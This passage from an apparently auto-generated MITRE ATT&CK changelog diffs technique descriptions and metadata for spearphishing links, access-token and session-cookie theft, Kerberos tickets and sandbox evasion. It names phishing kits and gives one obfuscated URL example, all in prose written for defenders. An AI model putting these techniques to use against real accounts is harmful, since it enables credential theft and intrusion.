urgent messages. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, the malicious emails contain links generally accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser.(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin) The given website may be a clone of a legitimate site (such as an online or corporate login portal) or may closely resemble a legitimate site in appearance and have a URL containing elements from the real site. URLs may also be obfuscated by taking advantage of quirks in the URL schema, such as the acceptance of integer- or hexadecimal-based hostname formats and the automatic discarding of text before an “@” symbol: for example, `hxxp://google.com@1157586937`.(Citation: Mandiant URL Obfuscation 2023) Adversaries may also embed “tracking pixels”, "web bugs", or "web beacons" within phishing messages to verify the receipt of an email, while also potentially profiling and tracking victim information such as IP address.(Citation: NIST Web Bug) (Citation: Ryte Wiki) These mechanisms often appear as small images (typically one pixel in size) or otherwise obfuscated objects and are typically delivered as HTML code containing a link to a remote server. (Citation: Ryte Wiki)(Citation: IAPP) Adversaries may also be able to spoof a complete website using what is known as a "browser-in-the-browser" (BitB) attack. By generating a fake browser popup window with an HTML-based address bar that appears to contain a legitimate URL (such as an authentication portal), they may be able to prompt users to enter their credentials while bypassing typical URL verification methods.(Citation: ZScaler BitB 2020)(Citation: Mr. D0x BitB 2022) Adversaries can use phishing kits such as `EvilProxy` and `Evilginx2` to perform adversary-in-the-middle phishing by proxying the connection between the victim and the legitimate website. On a successful login, the victim is redirected to the legitimate website, while the adversary captures their session cookie (i.e., [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)) in addition to their username and password. This may enable the adversary to then bypass MFA via [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004).(Citation: Proofpoint Human Factor) Adversaries may also send a malicious link in the form of Quick Response (QR) Codes (also known as “quishing”). These links may direct a victim to a credential phishing page.(Citation: QR-campaign-energy-firm) By using a QR code, the URL may not be exposed in the email and may thus go undetected by most automated email security scans.(Citation: qr-phish-agriculture) These QR codes may be scanned by or delivered directly to a user’s mobile device (i.e., [Phishing](https://attack.mitre.org/techniques/T1660)), which may be less secure in several relevant ways.(Citation: qr-phish-agriculture) For example, mobile users may not be able to notice minor differences between genuine and credential harvesting websites due to mobile’s smaller form factor. From the fake website, information is gathered in web forms and sent to the adversary. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.
x_mitre_version1.51.6
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'IAPP', 'description': 'IAPP. (n.d.). Retrieved March 5, 2024.', 'url': 'https://iapp.org/resources/article/web-beacon/'}
external_references{'source_name': 'QR-campaign-energy-firm', 'description': 'Jonathan Greig. (2023, August 16). Phishing campaign used QR codes to target large energy company. Retrieved November 27, 2023.', 'url': 'https://therecord.media/phishing-campaign-used-qr-codes-to-target-energy-firm'}
external_references{'source_name': 'Ryte Wiki', 'description': 'Ryte Wiki. (n.d.). Retrieved March 5, 2024.', 'url': 'https://en.ryte.com/wiki/Tracking_Pixel'}
external_references{'source_name': 'qr-phish-agriculture', 'description': 'Tim Bedard and Tyler Johnson. (2023, October 4). QR Code Scams & Phishing. Retrieved November 27, 2023.', 'url': 'https://www.proofpoint.com/us/blog/email-and-cloud-threats/cybersecurity-stop-month-qr-code-phishing'}
x_mitre_contributorsObsidian Security
x_mitre_contributorsSam Seabrook, Duke Energy

[T1528] Steal Application Access Token

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
New Description
t1Adversaries can steal application access tokens as a means ot1Adversaries can steal application access tokens as a means o
>f acquiring credentials to access remote systems and resourc>f acquiring credentials to access remote systems and resourc
>es.  Application access tokens are used to make authorized A>es.  Application access tokens are used to make authorized A
>PI requests on behalf of a user or service and are commonly >PI requests on behalf of a user or service and are commonly 
>used as a way to access resources in cloud and container-bas>used as a way to access resources in cloud and container-bas
>ed applications and software-as-a-service (SaaS).(Citation: >ed applications and software-as-a-service (SaaS).(Citation: 
>Auth0 - Why You Should Always Use Access Tokens to Secure AP>Auth0 - Why You Should Always Use Access Tokens to Secure AP
>Is Sept 2019) OAuth is one commonly implemented framework th>Is Sept 2019)  Adversaries who steal account API tokens in c
>at issues tokens to users for access to systems. Adversaries>loud and containerized environments may be able to access da
> who steal account API tokens in cloud and containerized env>ta and perform actions with the permissions of these account
>ironments may be able to access data and perform actions wit>s, which can lead to privilege escalation and further compro
>h the permissions of these accounts, which can lead to privi>mise of the environment.  For example, in Kubernetes environ
>lege escalation and further compromise of the environment.  >ments, processes running inside a container may communicate 
>In Kubernetes environments, processes running inside a conta>with the Kubernetes API server using service account tokens.
>iner communicate with the Kubernetes API server using servic> If a container is compromised, an adversary may be able to 
>e account tokens. If a container is compromised, an attacker>steal the container’s token and thereby gain access to Kuber
> may be able to steal the container’s token and thereby gain>netes API commands.(Citation: Kubernetes Service Accounts)  
> access to Kubernetes API commands.(Citation: Kubernetes Ser>Similarly, instances within continuous-development / continu
>vice Accounts)  Token theft can also occur through social en>ous-integration (CI/CD) pipelines will often use API tokens 
>gineeringin which case user action may be required to gran>to authenticate to other services for testing and deployment
>t access. An application desiring access to cloud-based serv>.(Citation: Cider Security Top 10 CICD Security Risks) If th
>ices or protected APIs can gain entry using OAuth 2.0 throug>ese pipelines are compromisedadversaries may be able to st
>h a variety of authorization protocols. An example commonly->eal these tokens and leverage their privileges.  Token theft
>used sequence is Microsoft's Authorization Code Grant flow.(> can also occur through social engineering, in which case us
>Citation: Microsoft Identity Platform Protocols May 2019)(Ci>er action may be required to grant access. OAuth is one comm
>tation: Microsoft - OAuth Code Authorization flow - June 201>only implemented framework that issues tokens to users for a
>9) An OAuth access token enables a third-party application t>ccess to systems. An application desiring access to cloud-ba
>o interact with resources containing user data in the ways r>sed services or protected APIs can gain entry using OAuth 2.
>equested by the application without obtaining user credentia>0 through a variety of authorization protocols. An example c
>ls.    Adversaries can leverage OAuth authorization by const>ommonly-used sequence is Microsoft's Authorization Code Gran
>ructing a malicious application designed to be granted acces>t flow.(Citation: Microsoft Identity Platform Protocols May 
>s to resources with the target user's OAuth token.(Citation:>2019)(Citation: Microsoft - OAuth Code Authorization flow - 
> Amnesty OAuth Phishing Attacks, August 2019)(Citation: Tren>June 2019) An OAuth access token enables a third-party appli
>d Micro Pawn Storm OAuth 2017) The adversary will need to co>cation to interact with resources containing user data in th
>mplete registration of their application with the authorizat>e ways requested by the application without obtaining user c
>ion server, for example Microsoft Identity Platform using Az>redentials.    Adversaries can leverage OAuth authorization 
>ure Portal, the Visual Studio IDE, the command-line interfac>by constructing a malicious application designed to be grant
>e, PowerShell, or REST API calls.(Citation: Microsoft - Azur>ed access to resources with the target user's OAuth token.(C
>e AD App Registration - May 2019) Then, they can send a [Spe>itation: Amnesty OAuth Phishing Attacks, August 2019)(Citati
>arphishing Link](https://attack.mitre.org/techniques/T1566/0>on: Trend Micro Pawn Storm OAuth 2017) The adversary will ne
>02) to the target user to entice them to grant access to the>ed to complete registration of their application with the au
> application. Once the OAuth access token is granted, the ap>thorization server, for example Microsoft Identity Platform 
>plication can gain potentially long-term access to features >using Azure Portal, the Visual Studio IDE, the command-line 
>of the user account through [Application Access Token](https>interface, PowerShell, or REST API calls.(Citation: Microsof
>://attack.mitre.org/techniques/T1550/001).(Citation: Microso>t - Azure AD App Registration - May 2019) Then, they can sen
>ft - Azure AD Identity Tokens - Aug 2019)  Application acces>d a [Spearphishing Link](https://attack.mitre.org/techniques
>s tokens may function within a limited lifetime, limiting ho>/T1566/002) to the target user to entice them to grant acces
>w long an adversary can utilize the stolen token. However, i>s to the application. Once the OAuth access token is granted
>n some cases, adversaries can also steal application refresh>, the application can gain potentially long-term access to f
> tokens(Citation: Auth0 Understanding Refresh Tokens), allow>eatures of the user account through [Application Access Toke
>ing them to obtain new access tokens without prompting the u>n](https://attack.mitre.org/techniques/T1550/001).(Citation:
>ser.    > Microsoft - Azure AD Identity Tokens - Aug 2019)  Applicati
 >on access tokens may function within a limited lifetime, lim
 >iting how long an adversary can utilize the stolen token. Ho
 >wever, in some cases, adversaries can also steal application
 > refresh tokens(Citation: Auth0 Understanding Refresh Tokens
 >), allowing them to obtain new access tokens without prompti
 >ng the user.    

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2023-09-19 21:23:50.233000+00:002024-03-24 19:41:54.832000+00:00
descriptionAdversaries can steal application access tokens as a means of acquiring credentials to access remote systems and resources. Application access tokens are used to make authorized API requests on behalf of a user or service and are commonly used as a way to access resources in cloud and container-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework that issues tokens to users for access to systems. Adversaries who steal account API tokens in cloud and containerized environments may be able to access data and perform actions with the permissions of these accounts, which can lead to privilege escalation and further compromise of the environment. In Kubernetes environments, processes running inside a container communicate with the Kubernetes API server using service account tokens. If a container is compromised, an attacker may be able to steal the container’s token and thereby gain access to Kubernetes API commands.(Citation: Kubernetes Service Accounts) Token theft can also occur through social engineering, in which case user action may be required to grant access. An application desiring access to cloud-based services or protected APIs can gain entry using OAuth 2.0 through a variety of authorization protocols. An example commonly-used sequence is Microsoft's Authorization Code Grant flow.(Citation: Microsoft Identity Platform Protocols May 2019)(Citation: Microsoft - OAuth Code Authorization flow - June 2019) An OAuth access token enables a third-party application to interact with resources containing user data in the ways requested by the application without obtaining user credentials. Adversaries can leverage OAuth authorization by constructing a malicious application designed to be granted access to resources with the target user's OAuth token.(Citation: Amnesty OAuth Phishing Attacks, August 2019)(Citation: Trend Micro Pawn Storm OAuth 2017) The adversary will need to complete registration of their application with the authorization server, for example Microsoft Identity Platform using Azure Portal, the Visual Studio IDE, the command-line interface, PowerShell, or REST API calls.(Citation: Microsoft - Azure AD App Registration - May 2019) Then, they can send a [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) to the target user to entice them to grant access to the application. Once the OAuth access token is granted, the application can gain potentially long-term access to features of the user account through [Application Access Token](https://attack.mitre.org/techniques/T1550/001).(Citation: Microsoft - Azure AD Identity Tokens - Aug 2019) Application access tokens may function within a limited lifetime, limiting how long an adversary can utilize the stolen token. However, in some cases, adversaries can also steal application refresh tokens(Citation: Auth0 Understanding Refresh Tokens), allowing them to obtain new access tokens without prompting the user. Adversaries can steal application access tokens as a means of acquiring credentials to access remote systems and resources. Application access tokens are used to make authorized API requests on behalf of a user or service and are commonly used as a way to access resources in cloud and container-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) Adversaries who steal account API tokens in cloud and containerized environments may be able to access data and perform actions with the permissions of these accounts, which can lead to privilege escalation and further compromise of the environment. For example, in Kubernetes environments, processes running inside a container may communicate with the Kubernetes API server using service account tokens. If a container is compromised, an adversary may be able to steal the container’s token and thereby gain access to Kubernetes API commands.(Citation: Kubernetes Service Accounts) Similarly, instances within continuous-development / continuous-integration (CI/CD) pipelines will often use API tokens to authenticate to other services for testing and deployment.(Citation: Cider Security Top 10 CICD Security Risks) If these pipelines are compromised, adversaries may be able to steal these tokens and leverage their privileges. Token theft can also occur through social engineering, in which case user action may be required to grant access. OAuth is one commonly implemented framework that issues tokens to users for access to systems. An application desiring access to cloud-based services or protected APIs can gain entry using OAuth 2.0 through a variety of authorization protocols. An example commonly-used sequence is Microsoft's Authorization Code Grant flow.(Citation: Microsoft Identity Platform Protocols May 2019)(Citation: Microsoft - OAuth Code Authorization flow - June 2019) An OAuth access token enables a third-party application to interact with resources containing user data in the ways requested by the application without obtaining user credentials. Adversaries can leverage OAuth authorization by constructing a malicious application designed to be granted access to resources with the target user's OAuth token.(Citation: Amnesty OAuth Phishing Attacks, August 2019)(Citation: Trend Micro Pawn Storm OAuth 2017) The adversary will need to complete registration of their application with the authorization server, for example Microsoft Identity Platform using Azure Portal, the Visual Studio IDE, the command-line interface, PowerShell, or REST API calls.(Citation: Microsoft - Azure AD App Registration - May 2019) Then, they can send a [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) to the target user to entice them to grant access to the application. Once the OAuth access token is granted, the application can gain potentially long-term access to features of the user account through [Application Access Token](https://attack.mitre.org/techniques/T1550/001).(Citation: Microsoft - Azure AD Identity Tokens - Aug 2019) Application access tokens may function within a limited lifetime, limiting how long an adversary can utilize the stolen token. However, in some cases, adversaries can also steal application refresh tokens(Citation: Auth0 Understanding Refresh Tokens), allowing them to obtain new access tokens without prompting the user.
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.21.3
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Cider Security Top 10 CICD Security Risks', 'description': 'Daniel Krivelevich and Omer Gil. (n.d.). Top 10 CI/CD Security Risks. Retrieved March 24, 2024.', 'url': 'https://www.cidersecurity.io/top-10-cicd-security-risks/'}
x_mitre_data_sourcesActive Directory: Active Directory Object Modification

[T1539] Steal Web Session Cookie

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
New Description
t1An adversary may steal web application or service session cot1An adversary may steal web application or service session co
>okies and use them to gain access to web applications or Int>okies and use them to gain access to web applications or Int
>ernet services as an authenticated user without needing cred>ernet services as an authenticated user without needing cred
>entials. Web applications and services often use session coo>entials. Web applications and services often use session coo
>kies as an authentication token after a user has authenticat>kies as an authentication token after a user has authenticat
>ed to a website.  Cookies are often valid for an extended pe>ed to a website.  Cookies are often valid for an extended pe
>riod of time, even if the web application is not actively us>riod of time, even if the web application is not actively us
>ed. Cookies can be found on disk, in the process memory of t>ed. Cookies can be found on disk, in the process memory of t
>he browser, and in network traffic to remote systems. Additi>he browser, and in network traffic to remote systems. Additi
>onally, other applications on the targets machine might stor>onally, other applications on the targets machine might stor
>e sensitive authentication cookies in memory (e.g. apps whic>e sensitive authentication cookies in memory (e.g. apps whic
>h authenticate to cloud services). Session cookies can be us>h authenticate to cloud services). Session cookies can be us
>ed to bypasses some multi-factor authentication protocols.(C>ed to bypasses some multi-factor authentication protocols.(C
>itation: Pass The Cookie)  There are several examples of mal>itation: Pass The Cookie)  There are several examples of mal
>ware targeting cookies from web browsers on the local system>ware targeting cookies from web browsers on the local system
>.(Citation: Kaspersky TajMahal April 2019)(Citation: Unit 42>.(Citation: Kaspersky TajMahal April 2019)(Citation: Unit 42
> Mac Crypto Cookies January 2019) There are also open source> Mac Crypto Cookies January 2019) Adversaries may also steal
> frameworks such as `Evilginx2` and `Muraena` that can gathe> cookies by injecting malicious JavaScript content into webs
>r session cookies through a malicious proxy (ex: [Adversary->ites or relying on [User Execution](https://attack.mitre.org
>in-the-Middle](https://attack.mitre.org/techniques/T1557)) t>/techniques/T1204) by tricking victims into running maliciou
>hat can be set up by an adversary and used in phishing campa>s JavaScript in their browser.(Citation: Talos Roblox Scam 2
>igns.(Citation: Github evilginx2)(Citation: GitHub Mauraena)>023)(Citation: Krebs Discord Bookmarks 2023)  There are also
>  After an adversary acquires a valid cookie, they can then > open source frameworks such as `Evilginx2` and `Muraena` th
>perform a [Web Session Cookie](https://attack.mitre.org/tech>at can gather session cookies through a malicious proxy (e.g
>niques/T1550/004) technique to login to the corresponding we>., [Adversary-in-the-Middle](https://attack.mitre.org/techni
>b application.>ques/T1557)) that can be set up by an adversary and used in 
 >phishing campaigns.(Citation: Github evilginx2)(Citation: Gi
 >tHub Mauraena)  After an adversary acquires a valid cookie, 
 >they can then perform a [Web Session Cookie](https://attack.
 >mitre.org/techniques/T1550/004) technique to login to the co
 >rresponding web application.
Details
values_changed
STIX FieldOld valueNew Value
modified2023-08-03 20:19:01.074000+00:002024-04-16 12:56:56.861000+00:00
descriptionAn adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website. Cookies are often valid for an extended period of time, even if the web application is not actively used. Cookies can be found on disk, in the process memory of the browser, and in network traffic to remote systems. Additionally, other applications on the targets machine might store sensitive authentication cookies in memory (e.g. apps which authenticate to cloud services). Session cookies can be used to bypasses some multi-factor authentication protocols.(Citation: Pass The Cookie) There are several examples of malware targeting cookies from web browsers on the local system.(Citation: Kaspersky TajMahal April 2019)(Citation: Unit 42 Mac Crypto Cookies January 2019) There are also open source frameworks such as `Evilginx2` and `Muraena` that can gather session cookies through a malicious proxy (ex: [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)) that can be set up by an adversary and used in phishing campaigns.(Citation: Github evilginx2)(Citation: GitHub Mauraena) After an adversary acquires a valid cookie, they can then perform a [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004) technique to login to the corresponding web application.An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website. Cookies are often valid for an extended period of time, even if the web application is not actively used. Cookies can be found on disk, in the process memory of the browser, and in network traffic to remote systems. Additionally, other applications on the targets machine might store sensitive authentication cookies in memory (e.g. apps which authenticate to cloud services). Session cookies can be used to bypasses some multi-factor authentication protocols.(Citation: Pass The Cookie) There are several examples of malware targeting cookies from web browsers on the local system.(Citation: Kaspersky TajMahal April 2019)(Citation: Unit 42 Mac Crypto Cookies January 2019) Adversaries may also steal cookies by injecting malicious JavaScript content into websites or relying on [User Execution](https://attack.mitre.org/techniques/T1204) by tricking victims into running malicious JavaScript in their browser.(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023) There are also open source frameworks such as `Evilginx2` and `Muraena` that can gather session cookies through a malicious proxy (e.g., [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)) that can be set up by an adversary and used in phishing campaigns.(Citation: Github evilginx2)(Citation: GitHub Mauraena) After an adversary acquires a valid cookie, they can then perform a [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004) technique to login to the corresponding web application.
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.21.3
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Krebs Discord Bookmarks 2023', 'description': 'Brian Krebs. (2023, May 30). Discord Admins Hacked by Malicious Bookmarks. Retrieved January 2, 2024.', 'url': 'https://krebsonsecurity.com/2023/05/discord-admins-hacked-by-malicious-bookmarks/'}
external_references{'source_name': 'Talos Roblox Scam 2023', 'description': 'Tiago Pereira. (2023, November 2). Attackers use JavaScript URLs, API forms and more to scam users in popular online game “Roblox”. Retrieved January 2, 2024.', 'url': 'https://blog.talosintelligence.com/roblox-scam-overview/'}
x_mitre_contributorsGoldstein Menachem

[T1558] Steal or Forge Kerberos Tickets

Current version: 1.5

Version changed from: 1.4 → 1.5

New Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User', 'root']
values_changed
STIX FieldOld valueNew Value
modified2023-03-30 21:01:50.214000+00:002024-03-01 16:58:02.395000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.41.5

[T1027.008] Obfuscated Files or Information: Stripped Payloads

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-20 17:03:30.462000+00:002024-04-16 12:26:49.584000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_platformsNetwork

[T1553] Subvert Trust Controls

Current version: 1.2

Version changed from: 1.1 → 1.2

New Mitigations:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-05-05 05:04:52.387000+00:002024-03-01 17:17:37.292000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.11.2

[T1195] Supply Chain Compromise

Current version: 1.6

Version changed from: 1.5 → 1.6

New Mitigations:

Details
values_changed
STIX FieldOld valueNew Value
modified2023-03-30 21:01:42.446000+00:002024-02-26 14:23:37.009000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.51.6

[T1573.001] Encrypted Channel: Symmetric Cryptography

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.2.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-03-26 21:25:37.306000+00:002023-12-26 20:58:19.356000+00:00
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_platformsNetwork

[T1218] System Binary Proxy Execution

Current version: 3.1

Version changed from: 3.0 → 3.1

New Mitigations:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-18 14:52:08.678000+00:002024-03-01 16:25:43.150000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version3.03.1

[T1497.001] Virtualization/Sandbox Evasion: System Checks

Current version: 2.2

Version changed from: 2.1 → 2.2


Old Description
New Description
t1Adversaries may employ various system checks to detect and at1Adversaries may employ various system checks to detect and a
>void virtualization and analysis environments. This may incl>void virtualization and analysis environments. This may incl
>ude changing behaviors based on the results of checks for th>ude changing behaviors based on the results of checks for th
>e presence of artifacts indicative of a virtual machine envi>e presence of artifacts indicative of a virtual machine envi
>ronment (VME) or sandbox. If the adversary detects a VME, th>ronment (VME) or sandbox. If the adversary detects a VME, th
>ey may alter their malware to disengage from the victim or c>ey may alter their malware to disengage from the victim or c
>onceal the core functions of the implant. They may also sear>onceal the core functions of the implant. They may also sear
>ch for VME artifacts before dropping secondary or additional>ch for VME artifacts before dropping secondary or additional
> payloads. Adversaries may use the information learned from > payloads. Adversaries may use the information learned from 
>[Virtualization/Sandbox Evasion](https://attack.mitre.org/te>[Virtualization/Sandbox Evasion](https://attack.mitre.org/te
>chniques/T1497) during automated discovery to shape follow-o>chniques/T1497) during automated discovery to shape follow-o
>n behaviors.(Citation: Deloitte Environment Awareness)  Spec>n behaviors.(Citation: Deloitte Environment Awareness)  Spec
>ific checks will vary based on the target and/or adversary, >ific checks will vary based on the target and/or adversary, 
>but may involve behaviors such as [Windows Management Instru>but may involve behaviors such as [Windows Management Instru
>mentation](https://attack.mitre.org/techniques/T1047), [Powe>mentation](https://attack.mitre.org/techniques/T1047), [Powe
>rShell](https://attack.mitre.org/techniques/T1059/001), [Sys>rShell](https://attack.mitre.org/techniques/T1059/001), [Sys
>tem Information Discovery](https://attack.mitre.org/techniqu>tem Information Discovery](https://attack.mitre.org/techniqu
>es/T1082), and [Query Registry](https://attack.mitre.org/tec>es/T1082), and [Query Registry](https://attack.mitre.org/tec
>hniques/T1012) to obtain system information and search for V>hniques/T1012) to obtain system information and search for V
>ME artifacts. Adversaries may search for VME artifacts in me>ME artifacts. Adversaries may search for VME artifacts in me
>mory, processes, file system, hardware, and/or the Registry.>mory, processes, file system, hardware, and/or the Registry.
> Adversaries may use scripting to automate these checks  int> Adversaries may use scripting to automate these checks  int
>o one script and then have the program exit if it determines>o one script and then have the program exit if it determines
> the system to be a virtual environment.   Checks could incl> the system to be a virtual environment.   Checks could incl
>ude generic system properties such as host/domain name and s>ude generic system properties such as host/domain name and s
>amples of network traffic. Adversaries may also check the ne>amples of network traffic. Adversaries may also check the ne
>twork adapters addresses, CPU core count, and available memo>twork adapters addresses, CPU core count, and available memo
>ry/drive size.   Other common checks may enumerate services >ry/drive size. Once executed, malware may also use [File and
>running that are unique to these applicationsinstalled pro> Directory Discovery](https://attack.mitre.org/techniques/T1
>grams on the systemmanufacturer/product fields for strings>083) to check if it was saved in a folder or file with unexp
> relating to virtual machine applications, and VME-specific >ected or even analysis-related naming artifacts such as `mal
>hardware/processor instructions.(Citation: McAfee Virtual Ja>ware``sample`or `hash`.  Other common checks may enumera
>n 2017) In applications like VMWare, adversaries can also us>te services running that are unique to these applications, i
>e a special I/O port to send commands and receive output.   >nstalled programs on the system, manufacturer/product fields
> Hardware checks, such as the presence of the fan, temperatu> for strings relating to virtual machine applications, and V
>re, and audio devices, could also be used to gather evidence>ME-specific hardware/processor instructions.(Citation: McAfe
> that can be indicative a virtual environment. Adversaries m>e Virtual Jan 2017) In applications like VMWare, adversaries
>ay also query for specific readings from these devices.(Cita> can also use a special I/O port to send commands and receiv
>tion: Unit 42 OilRig Sept 2018)>e output.    Hardware checks, such as the presence of the fa
 >n, temperature, and audio devices, could also be used to gat
 >her evidence that can be indicative a virtual environment. A
 >dversaries may also query for specific readings from these d
 >evices.(Citation: Unit 42 OilRig Sept 2018)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.2.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-10-18 14:57:07.973000+00:002024-04-19 12:49:40.919000+00:00
descriptionAdversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness) Specific checks will vary based on the target and/or adversary, but may involve behaviors such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047), [PowerShell](https://attack.mitre.org/techniques/T1059/001), [System Information Discovery](https://attack.mitre.org/techniques/T1082), and [Query Registry](https://attack.mitre.org/techniques/T1012) to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, hardware, and/or the Registry. Adversaries may use scripting to automate these checks into one script and then have the program exit if it determines the system to be a virtual environment. Checks could include generic system properties such as host/domain name and samples of network traffic. Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size. Other common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions.(Citation: McAfee Virtual Jan 2017) In applications like VMWare, adversaries can also use a special I/O port to send commands and receive output. Hardware checks, such as the presence of the fan, temperature, and audio devices, could also be used to gather evidence that can be indicative a virtual environment. Adversaries may also query for specific readings from these devices.(Citation: Unit 42 OilRig Sept 2018)Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness) Specific checks will vary based on the target and/or adversary, but may involve behaviors such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047), [PowerShell](https://attack.mitre.org/techniques/T1059/001), [System Information Discovery](https://attack.mitre.org/techniques/T1082), and [Query Registry](https://attack.mitre.org/techniques/T1012) to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, hardware, and/or the Registry. Adversaries may use scripting to automate these checks into one script and then have the program exit if it determines the system to be a virtual environment. Checks could include generic system properties such as host/domain name and samples of network traffic. Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size. Once executed, malware may also use [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) to check if it was saved in a folder or file with unexpected or even analysis-related naming artifacts such as `malware`, `sample`, or `hash`. Other common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions.(Citation: McAfee Virtual Jan 2017) In applications like VMWare, adversaries can also use a special I/O port to send commands and receive output. Hardware checks, such as the presence of the fan, temperature, and audio devices, could also be used to gather evidence that can be indicative a virtual environment. Adversaries may also query for specific readings from these devices.(Citation: Unit 42 OilRig Sept 2018)
x_mitre_version2.12.2
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsKostya Vasilkov

[T1542.001] Pre-OS Boot: System Firmware

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may modify system firmware to persist on systemst1Adversaries may modify system firmware to persist on systems
>.The BIOS (Basic Input/Output System) and The Unified Extens>.The BIOS (Basic Input/Output System) and The Unified Extens
>ible Firmware Interface (UEFI) or Extensible Firmware Interf>ible Firmware Interface (UEFI) or Extensible Firmware Interf
>ace (EFI) are examples of system firmware that operate as th>ace (EFI) are examples of system firmware that operate as th
>e software interface between the operating system and hardwa>e software interface between the operating system and hardwa
>re of a computer. (Citation: Wikipedia BIOS) (Citation: Wiki>re of a computer.(Citation: Wikipedia BIOS)(Citation: Wikipe
>pedia UEFI) (Citation: About UEFI)  System firmware like BIO>dia UEFI)(Citation: About UEFI)  System firmware like BIOS a
>S and (U)EFI underly the functionality of a computer and may>nd (U)EFI underly the functionality of a computer and may be
> be modified by an adversary to perform or assist in malicio> modified by an adversary to perform or assist in malicious 
>us activity. Capabilities exist to overwrite the system firm>activity. Capabilities exist to overwrite the system firmwar
>ware, which may give sophisticated adversaries a means to in>e, which may give sophisticated adversaries a means to insta
>stall malicious firmware updates as a means of persistence o>ll malicious firmware updates as a means of persistence on a
>n a system that may be difficult to detect.> system that may be difficult to detect.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['Administrator', 'SYSTEM']
values_changed
STIX FieldOld valueNew Value
modified2023-03-30 21:01:49.493000+00:002024-04-16 12:21:51.311000+00:00
